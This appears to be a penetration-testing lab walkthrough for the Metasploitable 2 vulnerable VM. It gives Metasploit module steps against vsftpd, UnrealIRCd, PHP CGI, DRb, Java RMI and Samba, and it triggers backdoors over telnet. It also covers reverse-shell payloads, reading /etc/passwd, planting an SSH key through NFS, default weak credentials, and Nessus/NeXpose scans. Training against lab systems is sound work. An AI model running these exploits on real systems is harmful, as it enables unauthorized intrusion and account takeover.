Metasploitable 2 lab-2

Hacking UNIX FTP Server via VSFTP:
Run BackTrack or Kali Linux
Open terminal and run Metasploit msfconsole or run from backtrack menu
Run the following commands
 Msf> nmap –sV –p 21
(You will find if there is a FTP on target and port 21 is open)
 Msf>Search vsftp
(Available exploits will be shown)
 Msf> use exploit/unix/ftp/vsftp_234_backdoor
 Msf> info exploit/unix/ftp/vsftp_234_backdoor
 Msf> show options
 Msf> set RHOST
 Msf> show payloads
(You will get available payloads)
 Msf> set payload cmd/unix/interact
 Msf> exploit
(Game over your target victim is under your control and victim’s terminal shell)
You can run the following commands on victim shell

Id
Uname –a
Ifconfig
Whoami
Cat /etc/passwd
Exit and exit again

Hacking UNIX Server via Unreal lRCD 3.2.8.1 backdoor:
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
Run the following commands
 Msf> nmap –sV –p 6667
(You will find if there is Unreal ircd on target and port 6667 is open)
 Msf>Search unrealircd
(Available exploits will be shown)
 Msf> use exploit/unix/irc/unreal_ircd_3281_backdoor
 Msf> info exploit/unix/irc/unreal_ircd_3281_backdoor
 Msf> show options
 Msf> set RHOST
 Msf> show payloads
(You will get list of all available payloads)
 Msf> exploit


Hacking Web Server via PHP CGI Argument Injection:
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 80
(You will find if there is an Apache httpd 2.2.8 ((Ubuntu) DAV/2) on target and port 80 is open)
Type IP address of vulnerable web server like http://192.168.132.9/phpmyadmin/
(You will get PHP MyAdmin page and if you type Type IP address of vulnerable web server like http://192.168.132.9/phpmyadmin/?-s it will show server side coding)

 Msf>Search php_cgi
(Available exploits will be shown)
 Msf> info exploit/multi/http/php_cgi_arg_injection
 Msf> use exploit/multi/http/php_cgi_arg_injection
 Msf> show payloads
(You will get list of all available payloads)
 Msf> set payload php/meterpreter/reverse_tcp
 Msf> show options
 Msf> set RHOST (if require)
 Msf> set LHOST (if require)
 Msf> exploit
You will get meterpreter session on which you can run several remote shell commands like below.
Sysinfo
Ls
Cat index.php
(You can now see the source codes for index.php. GAME OVER)


DRuby Distributed Ruby Code Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something unknown on target and port 8787/tcp is open)
Msf>amap 8787
(You can see ruby and druby service is running)
 Msf> search drb
 Msf> info exploit/linux/misc/drb_remote_codeexec
 Msf> use exploit/linux/misc/drb_remote_codeexec
 Msf> show payloads
 Msf> set payload cmd/unix/reverse
 Msf> show options
 Msf> set URI druby://:8787
 Msf> set LHOST
 Msf> exploit
(Game over) you can type following commands in remote host session
id
uname –a
Ifconfig
whoami
Press Ctrl+C and y to abort the session

Java RMI Server – Java Code Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something rmiregistry on target and port 1099/tcp is open)
Msf>amap 8787
(You can see ruby and druby service is running)
 Msf> search rmiregistry
 Msf> info exploit/multi/misc/java_rmi_server
 Msf> use exploit/multi/misc/java_rmi_server
 Msf> show payloads
 Msf> show options
 Msf> set RHOST
 Msf> exploit
(Game over) you will get meterpreter session and can type following commands in remote host session
Sysinfo
Shell
id
uname –a
Ifconfig
Whoami
cat /et/passwd
type exit and exit again to abort the session


Samba -username map script- Remote Command Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something netbios-ssn on target and port 139/tcp is open)
 Msf> search samba
 Msf> info exploit/multi/samba/usermap_script
 Msf> use exploit/multi/ samba/usermap_script
 Msf> set RHOST
 Msf> exploit
(Game over) you will get meterpreter session and can type following commands in remote host session
id
uname –a
Ifconfig
Whoami
cat /et/passwd
Press Ctrl+ C then type Y and exit again to abort the session

NFS Misconfiguration – Access via SSH
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 nmap –sV –p 0-65535
(You will find something on target like port ssh 22/tcp, rpcbind 111/tcp and nfs 2049/tcp is open)
 ssh root@
(You will get permission denied publickey, password message)
 rpcinfo –p
(you will get all nfs information related to version 2, 3, and 4)
 showmount –e
(You can see Export list for <target IP address)
 ssh-keygen (This will generate a fake publickey to broadcast)
 mkdir /tmp/test
 mount –t nfs :/ /tmp/test/ -o nolock
 cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
 unmounts /tmp/test/
 ssh root@
(You will see the NFS share of remote server and system information)
Ifconfig
id
uname –a
Whoami
cat /et/passwd
type exit and exit again to abort the session

Caution: do not use this for any illegal activity and if done you and only you will be responsible for that.

Metasploitable 2 lab

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin.

Never expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means).
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available at the link .)

This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.

Getting Started

After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.

msfadmin@metasploitable:~$ ifconfig

eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1

inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

Services

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the Metasploitable 2 instance:

root@ubuntu:~# nmap -p0-65535 192.168.99.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT

Nmap scan report for 192.168.99.131

Host is up (0.00028s latency).

Not shown: 65506 closed ports

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

25/tcp open smtp

53/tcp open domain

80/tcp open http

111/tcp open rpcbind

139/tcp open netbios-ssn

445/tcp open microsoft-ds

512/tcp open exec

513/tcp open login

514/tcp open shell

1099/tcp open rmiregistry

1524/tcp open ingreslock

2049/tcp open nfs

2121/tcp open ccproxy-ftp

3306/tcp open mysql

3632/tcp open distccd

5432/tcp open postgresql

5900/tcp open vnc

6000/tcp open X11

6667/tcp open irc

6697/tcp open unknown

8009/tcp open ajp13

8180/tcp open unknown

8787/tcp open unknown

39292/tcp open unknown

43729/tcp open unknown

44813/tcp open unknown

55852/tcp open unknown

MAC Address: 00:0C:29:9A:52:C1 (VMware)

Nearly every one of these listening services provides a remote entry point into the system. In the next section, we will walk through some of these vectors.

Services: Unix Basics

TCP ports 512, 513, and 514 are known as “r” services, and have been misconfigured to allow remote access from any host (a standard “.rhosts + +” situation). To take advantage of this, make sure the “rsh-client” client is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH.

# rlogin -l root 192.168.99.131

Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below using rpcinfo to identify NFS and showmount -e to determine that the “/” share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p 192.168.99.131

program vers proto port service

100000 2 tcp 111 portmapper

100000 2 udp 111 portmapper

100024 1 udp 53318 status

100024 1 tcp 43729 status

100003 2 udp 2049 nfs

100003 3 udp 2049 nfs

100003 4 udp 2049 nfs

100021 1 udp 46696 nlockmgr

100021 3 udp 46696 nlockmgr

100021 4 udp 46696 nlockmgr

100003 2 tcp 2049 nfs

100003 3 tcp 2049 nfs

100003 4 tcp 2049 nfs

100021 1 tcp 55852 nlockmgr

100021 3 tcp 55852 nlockmgr

100021 4 tcp 55852 nlockmgr

100005 1 udp 34887 mountd

100005 1 tcp 39292 mountd

100005 2 udp 34887 mountd

100005 2 tcp 39292 mountd

100005 3 udp 34887 mountd

100005 3 tcp 39292 mountd

root@ubuntu:~# showmount -e 192.168.99.131

Export list for 192.168.99.131:

/ *

Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account’s authorized_keys file:

root@ubuntu:~# ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /root/.ssh/id_rsa.

Your public key has been saved in /root/.ssh/id_rsa.pub.

root@ubuntu:~# mkdir /tmp/r00t

root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# umount /tmp/r00t

root@ubuntu:~# ssh root@192.168.99.131

Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

Services: Backdoors

On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence “:)” [ a happy face ], the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it:

root@ubuntu:~# telnet 192.168.99.131 21

Trying 192.168.99.131…

Connected to 192.168.99.131.

Escape character is ‘^]’.

220 (vsFTPd 2.3.4)

user backdoored:)

331 Please specify the password.

pass invalid

^]

telnet> quit

Connection closed.

root@ubuntu:~# telnet 192.168.99.131 6200

Trying 192.168.99.131…

Connected to 192.168.99.131.

Escape character is ‘^]’.

id;

uid=0(root) gid=0(root)

On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

msfconsole

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131

msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.99.131:6667…

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead

[*] Sending backdoor command…

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo 8bMUYsfmGvOLHBxe;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “8bMUYsfmGvOLHBxe\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700

id

uid=0(root) gid=0(root)

Much less subtle is the old standby “ingreslock” backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@ubuntu:~# telnet 192.168.99.131 1524

Trying 192.168.99.131…

Connected to 192.168.99.131.

Escape character is ‘^]’.

root@metasploitable:/# id

uid=0(root) gid=0(root) groups=0(root)

Services:Unintentional Backdoors

In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

msfconsole

msf > use exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > set RHOST 192.168.99.131

msf exploit(distcc_exec) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo uk3UdiwLUq0LX3Bi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “uk3UdiwLUq0LX3Bi\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Samba, when configured with a writeable file share and “wide links” enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

root@ubuntu:~# smbclient -L //192.168.99.131

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment

——— —- ——-

print$ Disk Printer Drivers

tmp Disk oh noes!

opt Disk

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

root@ubuntu:~# msfconsole

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server…

[*] Trying to mount writeable share ‘tmp’…

[*] Trying to link ‘rootfs’ to the root filesystem…

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@ubuntu:~# smbclient //192.168.99.131/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

Weak Passwords

In additional to the more blatant backdoors and misconfigurations, Metasploit2 has terrible password security for both system and database server accounts. The primary administrative user msfadmin has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system.

Account Name Password
msfadmin msfadmin
user user
postgres postgres
sys batman
klog 123456789
service service

In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. The VNC service provides remote desktop access using the password password.

Vulnerable Web Services

Metasploitable 2 has deliberately vulnerable web applications pre-installed. The web server starts automatically when Metasploitable 2 is booted. To access the web applications, open a web browser and enter the URL http:// where is the IP address of Metasploitable 2. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from “NAT” to “Host Only”. (Note: A video tutorial on installing Metasploitable 2 is available at the link .)

In this example, Metasploitable 2 is running at IP 192.168.56.101. Browsing to http://192.168.56.101/ shows the web application home page.

metasploitable-web-home-page.png

Note: 192.168.56/24 is the default “host only” network in Virtual Box. IP address are assigned starting from “101”. Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary.

To access a particular web application, click on one of the links provided. Individual web applications may additionally be accessed by appending the application directory name onto http:// to create URL http:////. For example, the Mutillidae application may be access (in this example) at address http://192.168.56.101/mutillidae/. The applications are installed in Metasploitable 2 in the /var/www directory. (Note: See a list with command “ls /var/www”.) In the current version as of this writing, the applications are

mutillidae (NOWASP Mutillidae 2.1.19)
dvwa (Damn Vulnerable Web Application)
phpMyAdmin
tikiwiki (TWiki)
tikiwiki-old
dav (WebDav)

Vulnerable Web Service: Mutillidae

The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Inspired by DVWA, Mutillidae allows the user to change the “Security Level” from 0 (completely insecure) to 5 (secure). Additionally three levels of hints are provided ranging from “Level 0 – I try harder” (no hints) to “Level 2 – noob” (Maximum hints). If the application is damaged by user injections and hacks, clicking the “Reset DB” button resets the application to its original state.

Note: Tutorials on using Mutillidae are available at the webpwnized YouTube Channel.

mutillidae-home-page.png

Enable hints in the application by click the “Toggle Hints” button on the menu bar:

mutillidae-tutorial.png

The Mutillidae application contains at least the following vulnerabilities on these respective pages:

Page Vulnerabilities
add-to-your-blog.php

SQL Injection on blog entry

SQL Injection on logged in user name

Cross site scripting on blog entry

Cross site scripting on logged in user name

Log injection on logged in user name

CSRF

JavaScript validation bypass

XSS in the form title via logged in username

The show-hints cookie can be changed by user to enable hints even though they are not suppose to show in secure mode
arbitrary-file-inclusion.php

System file compromise

Load any page from any site

browser-info.php

XSS via referer HTTP header

JS Injection via referer HTTP header

XSS via user-agent string HTTP header
capture-data.php
XSS via any GET, POST, or Cookie
captured-data.php XSS via any GET, POST, or Cookie
config.inc* Contains unencrytped database credentials
credits.php Unvalidated Redirects and Forwards
dns-lookup.php

Cross site scripting on the host/ip field

O/S Command injection on the host/ip field

This page writes to the log. SQLi and XSS on the log are possible

GET for POST is possible because only reading POSTed variables is not enforced.
footer.php* Cross site scripting via the HTTP_USER_AGENT HTTP header.
framing.php Click-jacking
header.php*

XSS via logged in user name and signature

The Setup/reset the DB menu item canbe enabled by setting the uid value of the cookie to 1
html5-storage.php DOM injection on the add-key error message because the key entered is output into the error message without being encoded
index.php*

You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.

You can SQL injection the UID cookie value because it is used to do a lookup

You can change your rank to admin by altering the UID value

HTTP Response Splitting via the logged in user name because it is used to create an HTTP Header

This page is responsible for cache-control but fails to do so

This page allows the X-Powered-By HTTP header

HTML comments

There are secret pages that if browsed to will redirect user to the phpinfo.php page. This can be done via brute forcing
log-visit.php

SQL injection and XSS via referer HTTP header

SQL injection and XSS via user-agent string
login.php

Authentication bypass SQL injection via the username field and password field

SQL injection via the username field and password field

XSS via username field

JavaScript validation bypass
password-generator.php JavaScript injection
pen-test-tool-lookup.php JSON injection
phpinfo.php

This page gives away the PHP server configuration

Application path disclosure

Platform path disclosure
process-commands.php Creates cookies but does not make them HTML only
process-login-attempt.php Same as login.php. This is the action page.
redirectandlog.php Same as credits.php. This is the action page
register.php SQL injection and XSS via the username, signature and password field
rene-magritte.php Click-jacking
robots.txt Contains directories that are supposed to be private
secret-administrative-pages.php This page gives hints about how to discover the server configuration
set-background-color.php Cascading style sheet injection and XSS via the color field
show-log.php

Denial of Service if you fill up the log
XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields
site-footer-xss-discusson.php XSS via the user agent string HTTP header
source-viewer.php Loading of any arbitrary file including operating system files.
text-file-viewer.php

Loading of any arbitrary web page on the Interet or locally including the sites password files.

Phishing
user-info.php

SQL injection to dump all usernames and passwords via the username field or the password field

XSS via any of the displayed fields. Inject the XSS on the register.php page.

XSS via the username field
user-poll.php

Parameter pollution

GET for POST

XSS via the choice parameter

Cross site request forgery to force user choice
view-someones-blog.php XSS via any of the displayed fields. They are input on the add to your blog page.

Vulnerable Web Services: DVWA

From the DVWA home page: “Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.”.

DVWA contains instructions on the home page and additional information is available at Wiki Pages – Damn Vulnerable Web App.

Default username = admin

Default password = password

dvwa.png

Vulnerable Web Services: Information Disclosure

Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. In this example, the URL would be http://192.168.56.101/phpinfo.php. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE -CVE-2012-1823 and CVE -CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2.

You can download Metasploitable 2 VM from here

Running Nessus Via Msfconsole

For those situations where we choose to remain at the command line, there is also the option to connect to a Nessus version 4.4.x server directly from within msfconsole. The Nessus Bridge, written by Zate and covered in detail at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ uses xmlrpc to connect to a server instance of Nessus, allowing us to perform and import a vulnerability scan rather than doing a manual import.

We begin by first loading the Nessus Bridge plugin. Running ‘nessus_help’ will display the commands available to us. As you can see, it is quite full-featured.

msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[+] Nessus Help
[+] type nessus_help command for help with specific commands

Command Help Text
——- ———
Generic Commands
—————– —————–
nessus_connect Connect to a nessus server
nessus_logout Logout from the nessus server
nessus_help Listing of available nessus commands
nessus_server_status Check the status of your Nessus Server
nessus_admin Checks if user is an admin
nessus_server_feed Nessus Feed Type
nessus_find_targets Try to find vulnerable targets from a report

Reports Commands
—————– —————–
nessus_report_list List all Nessus reports
nessus_report_get Import a report from the nessus server in Nessus v2 format
nessus_report_hosts Get list of hosts from a report
nessus_report_host_ports Get list of open ports from a host from a report
nessus_report_host_detail Detail from a report item on a host

Scan Commands
—————– —————–
nessus_scan_new Create new Nessus Scan
nessus_scan_status List all currently running Nessus scans
…snip…

Prior to beginning, we need to connect to the Nessus server on our network. Note that we need to add ‘ok’ at the end of the connection string to acknowledge the risk of man-in-the-middle attacks being possible.

msf > nessus_connect dook:s3cr3t@192.168.1.100
[-] Warning: SSL connections are not verified in this release, it is possible for an attacker
[-] with the ability to man-in-the-middle the Nessus traffic to capture the Nessus
[-] credentials. If you are running this on a trusted network, please pass in ‘ok’
[-] as an additional parameter to this command.
msf > nessus_connect dook:s3cr3t@192.168.1.100 ok
[*] Connecting to https://192.168.1.100:8834/ as dook
[*] Authenticated
msf >

To see the scan policies that are available on the server, we issue the ‘nessus_policy_list’ command. If there are not any policies available, this means that you will need to connect to the Nessus GUI and create one before being able to use it.

msf > nessus_policy_list
[+] Nessus Policy List

ID Name Owner visability
— —- —– ———-
1 the_works dook private

msf >

To run a Nessus scan using our existing policy, using the command ‘nessus_scan_new’ followed by the policy ID number, a name for your scan, and the target.

msf > nessus_scan_new
[*] Usage:
[*] nessus_scan_new policy id scan name targets
[*] use nessus_policy_list to list all available policies
msf > nessus_scan_new 1 pwnage 192.168.1.161
[*] Creating scan from policy number 1, called “pwnage” and scanning 192.168.1.161
[*] Scan started. uid is 9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f
msf >

To see the progress of our scan, we run ‘nessus_scan_status’. Note that there is not a progress indicator so we keep running the command until we see the message ‘No Scans Running’.

msf > nessus_scan_status
[+] Running Scans

Scan ID Name Owner Started Status Current Hosts Total Hosts
——- —- —– ——- —— ————- ———–
9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f pwnage dook 19:39 Sep 27 2010 running 0 1

[*] You can:
[+] Import Nessus report to database : nessus_report_get reportid
[+] Pause a nessus scan : nessus_scan_pause scanid
msf > nessus_scan_status
[*] No Scans Running.
[*] You can:
[*] List of completed scans: nessus_report_list
[*] Create a scan: nessus_scan_new policy id scan name target(s)
msf >

When Nessus completes the scan, it generates a report for us with the results. To view the list of available reports, we run the ‘nessus_report_list’ command. To import a report, we run “nessus_report_get” followed by the report ID.

msf > nessus_report_list
[+] Nessus Report List

ID Name Status Date
— —- —— —-
9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f pwnage completed 19:47 Sep 27 2010

[*] You can:
[*] Get a list of hosts from the report: nessus_report_hosts report id
msf > nessus_report_get
[*] Usage:
[*] nessus_report_get report id
[*] use nessus_report_list to list all available reports for importing
msf > nessus_report_get 9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f
[*] importing 9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f
msf >

With the report imported, we can list the hosts and vulnerabilities just as we could when importing a report manually.

msf > hosts -c address,vulns

Hosts
=====

address vulns
——- —–
192.168.1.161 33

msf > vulns
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=3389 proto=tcp name=NSS-10940 refs=
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=1900 proto=udp name=NSS-35713 refs=
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=1030 proto=tcp name=NSS-22319 refs=
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-10396 refs=
[*] Time: 2010-09-28 01:51:38 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-10860 refs=CVE-2000-1200,BID-959,OSVDB-714
[*] Time: 2010-09-28 01:51:38 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-10859 refs=CVE-2000-1200,BID-959,OSVDB-715
[*] Time: 2010-09-28 01:51:39 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-18502 refs=CVE-2005-1206,BID-13942,IAVA-2005-t-0019
[*] Time: 2010-09-28 01:51:40 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-20928 refs=CVE-2006-0013,BID-16636,OSVDB-23134
[*] Time: 2010-09-28 01:51:41 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-35362 refs=CVE-2008-4834,BID-31179,OSVDB-48153
[*] Time: 2010-09-28 01:51:41 UTC Vuln: host=192.168.1.161
…snip…

Running NeXpose Via Msfconsole

The Metasploit/NeXpose integration is not limited to simply importing scan results files. You can run NeXpose scans directly from msfconsole by first making use of the ‘nexpose’ plugin.

msf > load nexpose

▄▄▄ ▄▄ ▄▄▄ ▄▄▄
███ ██ ██ ▄██
██▀█ ██ ▄████▄ ████ ██▄███▄ ▄████▄ ▄▄█████▄ ▄████▄
██ ██ ██ ██▄▄▄▄██ ██ ██▀ ▀██ ██▀ ▀██ ██▄▄▄▄ ▀ ██▄▄▄▄██
██ █▄██ ██▀▀▀▀▀▀ ████ ██ ██ ██ ██ ▀▀▀▀██▄ ██▀▀▀▀▀▀
██ ███ ▀██▄▄▄▄█ ██ ██ ███▄▄██▀ ▀██▄▄██▀ █▄▄▄▄▄██ ▀██▄▄▄▄█
▀▀ ▀▀▀ ▀▀▀▀▀ ▀▀▀ ▀▀▀ ██ ▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀ ▀▀▀▀▀
██

[*] Nexpose integration has been activated
[*] Successfully loaded plugin: nexpose

msf > help

Nexpose Commands
================

Command Description
——- ———–
nexpose_activity Display any active scan jobs on the Nexpose instance
nexpose_command Execute a console command on the Nexpose instance
nexpose_connect Connect to a running Nexpose instance ( user:pass@host[:port] )
nexpose_disconnect Disconnect from an active Nexpose instance
nexpose_discover Launch a scan but only perform host and minimal service discovery
nexpose_dos Launch a scan that includes checks that can crash services and devices (caution)
nexpose_exhaustive Launch a scan covering all TCP ports and all authorized safe checks
nexpose_report_templates List all available report templates
nexpose_save Save credentials to a Nexpose instance
nexpose_scan Launch a Nexpose scan against a specific IP range and import the results
nexpose_site_devices List all discovered devices within a site
nexpose_site_import Import data from the specified site ID
nexpose_sites List all defined sites
nexpose_sysinfo Display detailed system information about the Nexpose instance

…snip…

Before running a scan against a target, we first need to connect to our server running NeXpose by using the ‘nexpose_connect’ command along with the credentials for the NeXpose instance. Note that you will have to append ‘ok’ to the end of the connect string to acknowledge that the SSL connections are not verified.

msf > nexpose_connect -h
[*] Usage:
[*] nexpose_connect username:password@host[:port]
[*] -OR-
[*] nexpose_connect username password host port

msf > nexpose_connect loneferret:something@127.0.0.1:3780 ok
[*] Connecting to Nexpose instance at 127.0.0.1:3780 with username loneferret…

Now that we are connected to our server, we can run a vulnerability scan right from within Metasploit.

msf > nexpose_scan -h
Usage: nexpose_scan [options]

OPTIONS:

-E Exclude hosts in the specified range from the scan
-I Only scan systems with an address within the specified range
-P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
-c Specify credentials to use against these targets (format is type:user:pass
-d Scan hosts based on the contents of the existing database
-h This help menu
-n The maximum number of IPs to scan at a time (default is 32)
-s The directory to store the raw XML files from the Nexpose instance (optional)
-t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
-v Display diagnostic information about the scanning process

We’ll provide our scanner with the credentials for the ‘ssh’ services, and use the “full-audit” scan template. Our scan results should be very similar to one we previously imported.

msf > msf > nexpose_scan -c ssh:msfadmin:msfadmin -t full-audit 172.16.194.172
[*] Scanning 1 addresses with template aggressive-discovery in sets of 32
[*] Completed the scan of 1 addresses
msf >

msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
172.16.194.172 METASPLOITABLE Ubuntu Linux device

Again, we run ‘services’ and ‘vulns’ and we can see that the results are of the same quality as those we imported via the XML file.

msf > services

Services
========

host port proto name state info
—- —- —– —- —– —-
172.16.194.172 21 tcp ftp open vsFTPd 2.3.4
172.16.194.172 22 tcp ssh open OpenSSH 4.7p1
172.16.194.172 23 tcp telnet open
